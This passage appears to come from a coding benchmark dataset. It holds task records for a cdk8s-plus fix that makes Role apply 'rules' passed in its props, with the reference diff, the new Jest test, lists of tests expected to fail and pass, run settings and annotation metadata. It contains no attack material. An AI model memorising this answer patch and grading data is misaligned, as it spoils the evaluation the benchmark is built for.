protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add 
data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "default configuration", "custom configuration", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at 
instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "fromCommand", "fromHttpGet", "fromTcpSocket", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods 
selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", 
"creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and 
maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", 
"fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods 
selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Role.constructor(scope: Construct, id: string, props?: RoleProps) Location: src/role.ts Inputs: - scope – the construct tree parent (e.g., a Chart) where the Role will be added. - id – logical identifier for the Role within the scope. - props (optional) – RoleProps where the new optional field `rules?: Array<{ verbs: string[], resources: ApiResource[] }>` can be supplied to declare policy rules directly at construction time. Outputs: - Returns a new `Role` instance. The supplied `rules` are automatically converted to Kubernetes RBAC rules and emitted in the synthesized manifest under `rules` (each rule rendered with `apiGroups`, `resources`, and `verbs`). Description: Creates a Kubernetes Role resource. In addition to the existing properties, the constructor now accepts a `rules` array that allows callers to specify access rules up‑front, which are internally added via `allow` and appear in the generated manifest. This is exercised in the test by constructing a Role with a `rules` prop and asserting the rendered rule structure.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3813", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue title indicates a fix is needed so that Role respects rules passed via roleProps, but the issue description provides no details or acceptance criteria. The added test defines the expected behavior, and the change in src/role.ts directly satisfies that test without affecting other modules. Because the specification is ambiguous in the issue text and relies on the test for clarification, this is a B4 (AMBIGUOUS_SPEC) case.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
a428ad09333243488c0bc1e88b034433bfd404ab
2024-04-18 07:26:16
cdk8s-team__cdk8s-plus-4047
diff --git a/src/role.ts b/src/role.ts index bdf4eb93..0da4b118 100644 --- a/src/role.ts +++ b/src/role.ts @@ -104,6 +104,10 @@ export class Role extends base.Resource implements IRole { metadata: props.metadata, rules: Lazy.any({ produce: () => this.synthesizeRules() }), }); + + for (const rule of props.rules ?? []) { + this.allow(rule.verbs, ...rule.resources); + } } /** @@ -546,4 +550,4 @@ export class ClusterRole extends base.Resource implements IClusterRole, IRole { return { clusterRoleSelectors: [{ matchLabels: this._labelSelector }] }; } -} \ No newline at end of file +}
fix(role): use rules coming from the roleProps (#3813) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [fix(role): use rules coming from the roleProps (#3813)](https://github.com/cdk8s-team/cdk8s-plus/pull/3813) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Respect `rules` supplied through `Role` properties **Problem** When creating a Role, any rule definitions passed via its props were silently ignored, resulting in incomplete RBAC specifications. This caused roles to lack the intended permissions despite being declared. **Root Cause** The constructor only set up a lazy rule generator and never processed the explicit `rules` array from the provided properties. **Fix / Expected Behavior** - Iterate over the `rules` array supplied in the role’s properties during construction. - Register each rule using the same mechanism that regular `allow` calls use. - Preserve existing lazy rule synthesis for dynamically added permissions. - Ensure the final Role manifest includes all explicitly provided rules. **Risk & Validation** - Verify that adding explicit rules does not interfere with later incremental `allow` calls or duplicate rule handling. - Run the full test suite, including RBAC serialization tests, to confirm that generated Role manifests now contain the expected rule entries. - Add/extend tests that create a Role with predefined rules and assert their presence in the output.
4,047
cdk8s-team/cdk8s-plus
diff --git a/test/role.test.ts b/test/role.test.ts index d63180de..e2314754 100644 --- a/test/role.test.ts +++ b/test/role.test.ts @@ -154,6 +154,32 @@ Array [ }); + test('specify access from props', () => { + + // GIVEN + const chart = Testing.chart(); + + // WHEN + new kplus.Role(chart, 'my-role', { + rules: [ + { + verbs: ['get', 'list', 'watch'], + resources: [kplus.ApiResource.PODS], + }, + ], + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest[0].rules).toEqual(expect.arrayContaining([ + { + apiGroups: [''], + resources: ['pods'], + verbs: ['get', 'list', 'watch'], + }, + ])); + }); + test('giving access to a single pod and all pods still gives access to all pods', () => { // GIVEN @@ -546,4 +572,4 @@ Object { }); -}); \ No newline at end of file +});
[ "specify access from props" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", 
"cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Can mutate metadata", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for 
selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default 
minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "default configuration", "custom configuration", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "volume name is trimmed if needed", "custom volume name", 
"default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "auto mounting token can be disabled", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an 
unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", 
"can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "role can bind to imported", "secrets can be added to the service account", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy 
of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow 
is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules 
for the same path and host" ]
Method: Role.__init__(self, chart: Chart, id: str, props: RoleProps = None) Location: src/role.ts Inputs: chart – the CDK8s chart the role belongs to; id – logical identifier for the role; props (optional) – may contain a **rules** field, which is a list of objects each specifying `verbs: str[]` and `resources: ApiResource[]`. The constructor now iterates over `props.rules` (if provided) and calls `allow` for each rule. Outputs: a new Role instance that is added to the chart and synthesizes the supplied rules into the manifest. Description: Constructs a Role resource, automatically granting the listed permissions during construction when `props.rules` is supplied.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.87, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3813", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests that Role use rules supplied via roleProps, but the issue text provides no explicit acceptance criteria or description of the expected behavior, making the intent only partially described. The added test asserts that a 'rules' prop is processed and results in manifest rules, which is not mentioned in the issue, indicating a misalignment between test expectations and the issue specification. This lack of clear specification is a classic ambiguous spec problem, fitting B4. No other B‑category signals are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test expects Role constructor to accept a 'rules' property and translate it into manifest rules, which is not described in the issue text." 
